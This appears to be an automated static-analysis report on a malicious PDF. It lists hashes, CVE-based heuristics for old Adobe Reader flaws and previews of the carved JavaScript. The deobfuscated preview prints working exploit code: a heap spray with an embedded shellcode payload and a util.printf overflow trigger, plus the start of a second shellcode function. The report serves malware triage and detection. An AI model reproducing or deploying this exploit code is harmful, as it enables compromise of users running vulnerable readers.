Malicious PDF — malware analysis report

Static analysis result for SHA-256 604ec663632b4952…

MALICIOUS

PDF

118.6 KB
MD5: ac28139f934582cf593b0f98de0b7d03 SHA-1: da42ff819d2536f5ce8cce73439fb0cfe8cc93f8 SHA-256: 604ec663632b495258f9709ee9cbf759013adb8433f0bb18b113a2143002ba64
616 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF file contains obfuscated JavaScript that exploits multiple known vulnerabilities in Adobe Reader, including CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The script acts as a dispatcher, decoding and executing exploit code likely intended to download and run a further malicious payload. The presence of multiple exploit CVEs and the use of JavaScript strongly indicate a malicious exploit document.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 12

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • ClamAV: Pdf.Exploit.Agent-36086 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36086
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Large comment-padded JavaScript eval stager high PDF_JS_LARGE_COMMENT_PADDED_EVAL
    PDF JavaScript contains a very large stream padded with long random-looking block comments around String.fromCharCode and eval. This is an exploit-kit obfuscation shape used to bury a decoder and recovered stage inside noise, not normal PDF form automation.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0006_000.js
20407ca5b840296aa4712e2db91bf9168d294c0534cbf8d6c0deac61ffc3f550		 pdf-javascript-stream PDF /JS object 6 at offset 0x143 626908 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 42 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function cJJ(gYy){ /*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
... (truncated)
legacy_pdfkit_stage_000.js
571b8e0add7af0bbc9451791482f6d2565d77365ddf86b8e1f8f2a789babf278		 deobfuscated-js comment-padded substitution-hex decoded JavaScript at offset 0x143 10413 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 12 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp,len)
{
	while(yarsp.length*2<len){yarsp+=yarsp;} yarsp=yarsp.substring(0,len/2);return yarsp;
}
function util_printf()
{
	var payload=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%uE0FF%u22AC%u8404%u120D%uE004%uA9AC%uEC44%u5227%u4D18%u5227%u610C%u2268%u1FF3%uA953%u5BE8%u22E4%uE004%u22C6%u6E6C%u2CE2%u88E8%uDC34%uEE8E%uCDC4%u00CA%u4ACC%u2A37%u7926%uD86C%u8E8E%u88E3%u6B46%u088E%uF9C4%uC38E%u4A45%uAC5F%uFFB6%u0C6C%u213B%u0808%u23B3%uE004%u2625%u632F%u2647%u200F%uD3D9%u8E6C%u56C9%u8804%u4BDB%u896A%uDDF8%uC851%u7BF5%u200F%uA6A3%uE0FC%u22AC%u108F%u7A17%uE004%u48AC%u8804%u6685%uB7EC%u6BC4%uEFE9%u4AD2%uAB8F%u7D4F%u00EC%u22AC%u6904%u09A8%u0B87%u29A8%u95C4%uAF5D%uE081%u22AE%uB004%uDDC4%uE004%uDDAC%uD451%uA721%uE404%u22AC%u8A54%u48AC%u6D04%u2229%uE006%u72AC%uB5FB%uAF94%uE0B1%u22A8%u4C04%uE2A6%u1B71%uE5E2%uCE02%u5AC9%u2761%u26EA%uE004%u22AC%u6589%u26AC%uE004%uEB9F%uB055%u7753%uA038%uA6A3%uE084%u22AC%u694C%u6EE9%uE06C%u22EC%u8A04%uDDEC%uA851%uE2A7%u8E70%u6725%u8A64%u48AC%u8A04%u48AC%u8A04%uDDAC%uB051%uE2A7%uBA70%u22C6%uE06C%u22AC%u8A00%u48AC%u0904%u2206%uE004%uDDFC%uB451%uE2A7%uA270%u6725%u6D6C%u46E9%u8854%u62AC%uE004%u5753%u1F64%u4AD9%uB5FB%u29F4%u94C4%uA9B9%u8441%uE2A7%uEE70%u5753%u1F60%u42D9%u95FB%uDDE0%uA051%uF747%u95FB%uDDE0%uA451%uEB87%uB145%uA721%uE404%u22AC%u1F54%u0EF9%u1F6E%u7753%uB534%uCE27%u9D8F%u29A4%u94FB%u71E7%u3E8F%uA9FA%uDC77%u5627%u9837%uD1AF%u6B52%u02DA%u1307%uEB9F%uA14D%u2101%uB6C7%uD49F%u5E0B%u1ABC%u94D2%uE3A4%uEDCA%uD0AF%u0B44%u195D%uBEFA%uC7D9%u6B5E%uA947%uC45E%uFFAF%u6B62%u69A0%uBA8F%u21B0%u6BD9%uA9A8%u2507%u79F2%uE2EF%uE29F%u2259%u22A8%uB1EC%uDD53%u88FB%u56D8%uDA74%u0D83%u9365%u43C5%u906A%u50C3%u946A%u4BDE%uCE74%u4DCF%uCF69%u50D8%u8465%u0DC9%u833B%u1391%u9322%u46C5%u8139%u1094%u8233%u1A9F%uD667%u449F%uD462%u179D%u8134%u13C8%uD760%u479C%u863C%u17CA%u8537%u47CA%uC636%u1FDF%uE037%u22AC%u0004");
	var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
	var heapblock=nop+payload;
	var bigblock=unescape("%u0A0A%u0A0A");
	var headersize=20;
	var spray=headersize+heapblock.length;
	while(bigblock.length<spray){bigblock+=bigblock;}
	var fillblock=bigblock.substring(0,spray);
	var block=bigblock.substring(0,bigblock.length-spray);
	while(block.length+spray<0x40000){block=block+block+fillblock;}
	var mem_array=new Array();
	for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
	var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
	util.printf("%45000f",num);
}
	
function collab_email()
{
	var shellcode=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%uE0FF%u22AC%u8404%u120D%uE004%uA9AC%uEC44%u5227%u4D18%u5227%u610C%u2268%u1FF3%uA953%u5BE8%u22E4%uE004%u22C6%u6E6C%u2CE2%u88E8%uDC34%uEE8E%uCDC4%u00CA%u4ACC%u2A37%u7926%uD86C%u8E8E%u88E3%u6B46%u088E%uF9C4%uC38E%u4A45%uAC5F%uFFB6%u0C6C%u213B%u0808%u23B3%uE004%u2625%u632F%u2647%u200F%uD3D9%u8E6C%u56C9%u8804%u4BDB%u896A%uDDF8%uC851%u7BF5%u200F%uA6A3%uE0FC%u22AC%u108F%u7A17%uE004%u48AC%u8804%u6685%uB7EC%u6BC4%uEFE9%u4AD2%uAB8F%u7D4F%u00EC%u22AC%u6904%u09A8%u0B87%u29A8%u95C4%uAF5D%uE081%u22AE%uB004%uDDC4%uE004%uDDAC%uD451%uA721%uE404%u22AC%u8A54%u48AC%u6D04%u2229%uE006%u72AC%uB5FB%uAF94%uE0B1%u22A8%u4C04%uE2A6%u1B71%uE5E2%uCE02%u5AC9%u2761%u26EA%uE004%u22AC%u6589%u26AC%uE004%uEB9F%uB055%u7753%uA038%uA6A3%uE084%u22AC%u694C%u6EE9%uE06C%u22EC%u8A04%uDDEC%uA851%uE2A7%u8E70%u6725%u8A64%u48AC%u8A04%u48AC%u8A04%uDDAC%uB051%uE2A7%uBA70%u22C6%uE06C%u22AC%u8A00%u48AC%u0904%u2206%uE004%uDDFC%uB451%uE2A7%uA270%u6725%u6D6C%u46E9%u8854%u62AC%uE004%u5753%u1F64%u4AD9%uB5FB%u29F4%u94C4%uA9B9%u8441%uE2A7%uEE70%u5753%u1F60%u42D9%u95FB%uDDE0%uA051%uF747%u95FB%uDDE0%uA451%uEB87%uB145%uA721%uE404%u22AC%u1F54%u0EF9%u1F6E%u7753%uB534%uCE27%u9D8F%u29A4%u94FB
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.